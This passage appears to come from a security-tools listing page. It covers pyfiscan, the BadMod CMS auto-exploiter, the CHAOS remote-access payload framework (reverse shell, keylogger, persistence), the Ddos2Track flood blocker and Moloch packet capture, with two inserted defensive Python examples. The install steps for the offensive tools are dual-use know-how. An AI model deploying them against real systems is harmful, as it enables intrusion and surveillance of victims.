    • WikkaWiki
    • WordPress
    • X-Cart
    • Zenphoto
    • Zikula

    Detects following end-of-life software:
    • Bugzilla 4.2 is end-of-life since 2015-11-30
    • Drupal 6 is end-of-life since 2016-02-24
    • Gallery 1
    • Joomla 1.5 is end-of-life since 2012-04-30
    • Joomla 1.6 is end-of-life since 2011-08-19. 1.6.x should be upgraded to 1.6.6 before moving to 1.7.x
    • Joomla 1.7 is end-of-life since 2012-02-24
    • Joomla 2.5
    • MediaWiki 1.18
    • MediaWiki 1.19 is end-of-life since 2015-04-25
    • MediaWiki 1.20
    • MediaWiki 1.21 is end-of-life since 2014-06-25
    • MediaWiki 1.22
    • MediaWiki 1.23 is end-of-life since 2017-05-31
    • MediaWiki 1.24
    • MediaWiki 1.25
    • MediaWiki 1.26 is end-of-life since 2016-11-20
    • MediaWiki 1.28 is end-of-life since 2017-11-01
    • ownCloud 4
    • ownCloud 5
    • ownCloud 6
    • ownCloud 7
    • ownCloud 8.0
    • ownCloud 8.1
    • ownCloud 8.2
    • SaurusCMS

    Installation
    apt-get install python python-pip libpython2.7-dev libyaml-dev git
    git clone https://github.com/fgeek/pyfiscan.git && cd pyfiscan
    pip2 install -r requirements.lst
    or you can use BlackArch Linux.

    Notes


    BadMod - BadMod Detect Website CMS, Website Scanner & Auto Exploiter


    Auto exploiter & get all server sites & bing dorker

    Installation
    git clone https://github.com/MrSqar-Ye/BadMod.git

    BadMod tool
    Detect website CMS & website scanner => auto exploiter


    Exploit :
    [!] Wordpress
    [+] joomla
    [!] drupal
    [+] Cms made simple 


    Video



    CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems


    CHAOS allows generating payloads and controlling remote Windows systems.

    Disclaimer
    This project was created only for learning purpose.
    THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

    Features
    • Reverse Shell
    • Download File
    • Upload File
    • Screenshot
    • Keylogger
    • Persistence
    • Open URL Remotely
    • Get Operating System Name
    • Run Fork Bomb

    Tested On
    Kali Linux - ROLLING EDITION

    How To Use
    # Install dependencies (You need Golang and UPX package installed)
    $ apt install golang xterm git upx-ucl -y

    # Clone this repository
    $ git clone https://github.com/tiagorlampert/CHAOS.git

    # Get and install external imports (requirement to screenshot)
    $ go get github.com/kbinani/screenshot && go get github.com/lxn/win
    $ go install github.com/kbinani/screenshot && go install github.com/lxn/win

    # You may see the message "package github.com/lxn/win: build constraints exclude all Go files".
    # It occurs because these libraries are for Windows systems, but they are necessary to build the payload.

    # Go into the repository
    $ cd CHAOS

    # Run
    $ go run CHAOS.go

    Video




    Ddos2Track - An Script To Avoid HTTP Floods Attacks


    With this tool you can block HTTP Flood attacks and analyze them with a honeypot.
    THE TOOL SENDS YOU A WARNING EMAIL AFTER DETECTING A DDOS ATTACK!
    First start the honeypot server (tools/analyze/logger.py).
    Then start the detector (tools/detector/detector.sh) in another window.
    If an attacker attacks your server on the preconfigured port (80), the detector will redirect all of the attacker's requests to the honeypot for 5 seconds, and then the attacker's IP will be blocked.
    You can modify the options and activate redir2attackers; this option redirects all traffic to the attacker's IP, so the attacker will be DoSing its own network ;)
    To view all DDoS requests, see the log at '/tools/analyzer/ddos.log'. To view all attacker IPs, see 'tools/detector/attackers.txt'.

    INSTALLING
    chmod 777 INSTALL.sh
    sh INSTALL.sh

    USING
    ./ddos2track
    Follow instructions
    Now wait for attackers :)
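    The detect, honeypot, then block sequence described above, as an added Python example that is not Ddos2Track's own code: a sliding-window request counter per source IP drives a per-source state machine (normal, 5 seconds of honeypot, blocked), replayed over constructed log lines. The threshold and window length are assumed values; the page states only the 5-second honeypot stage and port 80.

```python
from collections import defaultdict, deque
# Constructed access-log sample: "<source-ip> <unix-timestamp> <request-line>".
SAMPLE_LOG = """\
203.0.113.7 100.0 GET / HTTP/1.1
203.0.113.7 100.1 GET / HTTP/1.1
198.51.100.2 100.2 GET /index.html HTTP/1.1
203.0.113.7 100.2 GET / HTTP/1.1
203.0.113.7 100.3 GET / HTTP/1.1
203.0.113.7 100.4 GET / HTTP/1.1
198.51.100.2 103.0 GET /about.html HTTP/1.1
203.0.113.7 106.0 GET / HTTP/1.1
"""
class FloodDetector:
    """Per-source state machine: normal -> honeypot (honeypot_secs) -> blocked.
    threshold/window are assumed values (the page gives no numbers for them)."""

    def __init__(self, threshold=4, window=1.0, honeypot_secs=5.0):
        self.threshold, self.window, self.honeypot_secs = threshold, window, honeypot_secs
        self.hits = defaultdict(deque)  # ip -> request timestamps inside the window
        self.honeypot_until = {}        # ip -> time at which the honeypot stage ends
        self.blocked = set()

    def handle(self, ip, ts):
        """Return the action for one request: 'serve', 'honeypot' or 'block'."""
        if ip in self.blocked:
            return "block"
        if ip in self.honeypot_until:
            if ts < self.honeypot_until[ip]:
                return "honeypot"
            self.blocked.add(ip)        # honeypot stage over: block the source for good
            del self.honeypot_until[ip]
            return "block"
        window = self.hits[ip]
        window.append(ts)
        while ts - window[0] > self.window:  # forget requests older than the window
            window.popleft()
        if len(window) >= self.threshold:    # flood: divert the source to the honeypot
            self.honeypot_until[ip] = ts + self.honeypot_secs
            window.clear()
            return "honeypot"
        return "serve"

def process_log(log_text, detector=None):
    """Replay log lines through a detector; returns ([(ip, action), ...], detector)."""
    det = detector or FloodDetector()
    actions = []
    for line in log_text.splitlines():
        ip, ts, _request = line.split(" ", 2)
        actions.append((ip, det.handle(ip, float(ts))))
    return actions, det
```

    In a real deployment the 'honeypot' action would be the port redirect and 'block' the firewall rule; here they are returned so the decision logic can be tested on its own.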

    Moloch - An Open Source, Large Scale, Full Packet Capturing, Indexing, And Database System

    Moloch is an open source, large scale, full packet capturing, indexing, and database system. Moloch augments your current security infrastructure to store and index network traffic in standard PCAP format, providing fast, indexed access. An intuitive and simple web interface is provided for PCAP browsing, searching, and exporting. Moloch exposes APIs which allow PCAP data and JSON formatted session data to be downloaded and consumed directly. Moloch stores and exports all packets in standard PCAP format, allowing you to also use your favorite PCAP ingesting tools, such as wireshark, during your analysis workflow.

    Access to Moloch is protected by using HTTPS with digest passwords or by using an authentication-providing web server proxy. All PCAPs are stored on the sensors and are only accessed using the Moloch interface or API. Moloch is not meant to replace an IDS but instead to work alongside them to store and index all the network traffic in standard PCAP format, providing fast access. Moloch is built to be deployed across many systems and can scale to handle tens of gigabits/sec of traffic. PCAP retention is based on available sensor disk space. Meta data retention is based on the Elasticsearch cluster scale. Both can be increased at any time and are under your complete control.

    Sessions Tab

    SPI View Tab

    Building
    For advanced users, if you wish to build Moloch yourself, run ./easybutton-build.sh --install which will download all the prerequisites, build, and install. make config can be used to perform an initial moloch configuration. The RPM & DEB files are much easier to deal with than building yourself and are recommended.

    Components
    The Moloch system is comprised of 3 components
    1. capture - A threaded C application that monitors network traffic, writes PCAP formatted files to disk, parses the captured packets and sends meta data (SPI data) to elasticsearch.
    2. viewer - A node.js application that runs per capture machine and handles the web interface and transfer of PCAP files.
    3. elasticsearch - The search database technology powering Moloch.

    Building and Installing
    Moloch is a complex system to build and install manually. The following are rough guidelines.

    Installing Elasticsearch
    Recommended version 5.6.x for Moloch 0.18 and later. Download elasticsearch.
    Important: At this time all development is done with elasticsearch 5.6.7.
    Inside the installed $MOLOCH_PREFIX/db directory run the db.pl http://A_ES_HOSTNAME:9200 init script.
    Building Capture
    Use the ./easybutton-build.sh script to download all thirdparty libraries and build moloch.

    Building Viewer
    1. Install Node.js version 6.x, currently 8.x is not supported. (Moloch versions before 0.18 required 4)
    2. In the viewer directory run npm install.

    Configuration
    1. Make sure you download the latest freely available GeoIP and RIR files.
    2. Edit the config.ini file.
    3. In the viewer directory, run addUser.js to add users. Pass the --admin flag if you want admin users that can edit users from the web site. This is a good test if elasticsearch and config.ini are setup correctly:
      node addUser.js <userid> "<Friendly Name>" <password> [--admin]
    4. Edit the db/daily.sh script, and set it up in the crontab on one machine.

    Get it Running
    If you've made it this far, you are awesome!
    On each capture machine you need to run at least one moloch-capture and one moloch-viewer. Using make config will create startup files, or you can find the source files for make config in the release directory.

    Test it Out
    Point your browser to any Moloch instance at https://<hostname>:<port> and start tinkering!

    Advanced Configuration
    Hardware Requirements

    Moloch is built to run across many machines for large deployments. For demo, small network, or home installations everything on a single machine is fine.
    For larger installations please see the FAQ for recommended configurations.
    The following are rough guidelines for capturing large amounts of data with high bit rates; obviously tailor them to your specific situation. It is not recommended to run the capture and elasticsearch processes on the same machines for highly utilized GigE networks.
    1. Moloch capture/viewer systems read FAQ Entry
    2. Moloch elasticsearch systems read FAQ Entry

    Example Configuration
    Here is an example system setup for monitoring 8x GigE highly-utilized networks, with an average of ~5 Gigabit/sec, with ~7 days of pcap storage.
    • capture/viewer machines
      • 5x HP Apollo 4200
      • 64GB of memory
      • 80TB of disk
      • Running Moloch and Suricata
    • elasticsearch machines
      • 10x HP DL380-G7
      • 128GB of memory
      • 6TB of disk
      • Each system running 1 node

    Security Information

    Ports Used
    • tcp 8005 - Moloch web interface
    • tcp 9200-920x (configurable upper limit) - Elasticsearch service ports
    • tcp 9300-930x (configurable upper limit) - Elasticsearch mesh connections

    Important Considerations
    • Elasticsearch provides NO security, so iptables MUST be used allowing only Moloch machines to talk to the elasticsearch machines (ports 9200-920x) and for them to mesh connect (ports 9300-930x). An example with 3 ES machines, 2 nodes each, and a viewer-only machine:
      for ip in moloches1 moloches2 moloches3 molochvieweronly1; do
        iptables -A INPUT -i eth0 -p tcp --dport 9300 -s $ip -j ACCEPT
        iptables -A INPUT -i eth0 -p tcp --dport 9200 -s $ip -j ACCEPT
        iptables -A INPUT -i eth0 -p tcp --dport 9301 -s $ip -j ACCEPT
        iptables -A INPUT -i eth0 -p tcp --dport 9201 -s $ip -j ACCEPT
      done
      iptables -A INPUT -i eth0 -p tcp --dport 9300 -j DROP
      iptables -A INPUT -i eth0 -p tcp --dport 9200 -j DROP
      iptables -A INPUT -i eth0 -p tcp --dport 9301 -j DROP
      iptables -A INPUT -i eth0 -p tcp --dport 9201 -j DROP
    • Moloch machines should be locked down, however they need to talk to each other (port 8005), to the elasticsearch machines (ports 9200-920x), and the web interface needs to be open (port 8005).
    • Moloch viewer should be configured to use SSL.
      • It's easiest to use a single certificate with multiple DNs.
      • Make sure you protect the cert on the filesystem with proper file permissions.
    • It is possible to set up a Moloch viewer on a machine that doesn't capture any data that gateways all requests.
      • It is also possible to place apache in front of moloch, so it can handle the authentication and pass the username on to moloch
      • This is how we deploy it
    • A shared password stored in the Moloch configuration file is used to encrypt password hashes AND for inter-Moloch communication.
      • Make sure you protect the config file on the filesystem with proper file permissions.
      • Encrypted password hashes are used so a new password hash can not be inserted into elasticsearch directly in case it hasn't been secured.
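    An added check (example code, not part of Moloch) that audits an iptables-save style INPUT ruleset against the layout the list above prescribes: every Elasticsearch port in 9200-920x and 9300-930x accepts only the allow-listed Moloch hosts and ends in a catch-all DROP, for any node count rather than only the two-node case shown. The rule text and the host allow-list below are constructed; run the function on the output of iptables-save for a real sensor.

```python
import re

# Constructed iptables-save style INPUT rules for a 2-node ES layout (ports
# 9200/9201 and 9300/9301). Two deliberate defects: 9201 accepts a non-Moloch
# host, and 9301 has no catch-all DROP.
SAMPLE_RULES = """\
-A INPUT -i eth0 -p tcp -m tcp --dport 8005 -j ACCEPT
-A INPUT -s 10.0.0.1/32 -i eth0 -p tcp -m tcp --dport 9300 -j ACCEPT
-A INPUT -s 10.0.0.1/32 -i eth0 -p tcp -m tcp --dport 9200 -j ACCEPT
-A INPUT -s 10.0.0.1/32 -i eth0 -p tcp -m tcp --dport 9301 -j ACCEPT
-A INPUT -s 10.0.0.1/32 -i eth0 -p tcp -m tcp --dport 9201 -j ACCEPT
-A INPUT -s 10.0.0.99/32 -i eth0 -p tcp -m tcp --dport 9201 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9300 -j DROP
-A INPUT -i eth0 -p tcp -m tcp --dport 9200 -j DROP
-A INPUT -i eth0 -p tcp -m tcp --dport 9201 -j DROP
"""
MOLOCH_HOSTS = {"10.0.0.1", "10.0.0.2"}  # assumed allow-list (capture/viewer hosts)

def parse_rule(line):
    """Return (dport, source or None, target) for a TCP INPUT rule, else None."""
    if not line.startswith("-A INPUT"):
        return None
    port = re.search(r"--dport (\d+)", line)
    target = re.search(r"-j (ACCEPT|DROP)\b", line)
    if not (port and target):
        return None
    src = re.search(r"-s (\S+)", line)
    return int(port.group(1)), (src.group(1).split("/")[0] if src else None), target.group(1)

def es_ports(node_count):
    """9200..920x and 9300..930x for node_count nodes per ES host."""
    return sorted(set(range(9200, 9200 + node_count)) | set(range(9300, 9300 + node_count)))

def audit(ruleset, allowed_hosts, node_count):
    """List findings for the ES ports; an empty list means they are fenced as required."""
    rules = [r for r in map(parse_rule, ruleset.splitlines()) if r]
    findings = []
    for port in es_ports(node_count):
        chain = [(src, tgt) for p, src, tgt in rules if p == port]
        for src, tgt in chain:
            if tgt == "ACCEPT" and src not in allowed_hosts:
                findings.append(f"port {port}: ACCEPT from {src or 'any'} is not a Moloch host")
        # iptables is first-match: a source-less DROP must exist and sit after the ACCEPTs
        drop = next((i for i, (src, tgt) in enumerate(chain) if tgt == "DROP" and src is None), None)
        if drop is None:
            findings.append(f"port {port}: no catch-all DROP rule")
        elif any(tgt == "ACCEPT" for _, tgt in chain[drop:]):
            findings.append(f"port {port}: ACCEPT rule after DROP is never reached")
    return findings
```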

    FAQ
    For answers to frequently asked questions, please see the FAQ.

    Wiki
    We use GitHub’s built-in wiki located at https://github.com/aol/moloch/wiki.

    Upgrading
    Upgrading is easy if using the RPM/DEB files.
    • Download and install the latest version, pay attention to any special instructions
    • You might need to upgrade the database with /data/moloch/db/db.pl http://localhost:9200 upgrade
    • Restart the moloch capture and viewer processes
    If upgrading from source it is a manual process.
    • Update the moloch repository from github
    • Build the moloch system using "easybutton-build.sh"
    • Shut down currently running old capture and viewer processes
    • Optionally use "make install" to copy the new binaries and other items and/or push the new items to the capture hosts
    • Run "npm update" in the viewer directory if not using "make install"
    • Make sure ES is running and update the database using the "db/db.pl host:port upgrade" script
    • Start the new capture and viewer processes
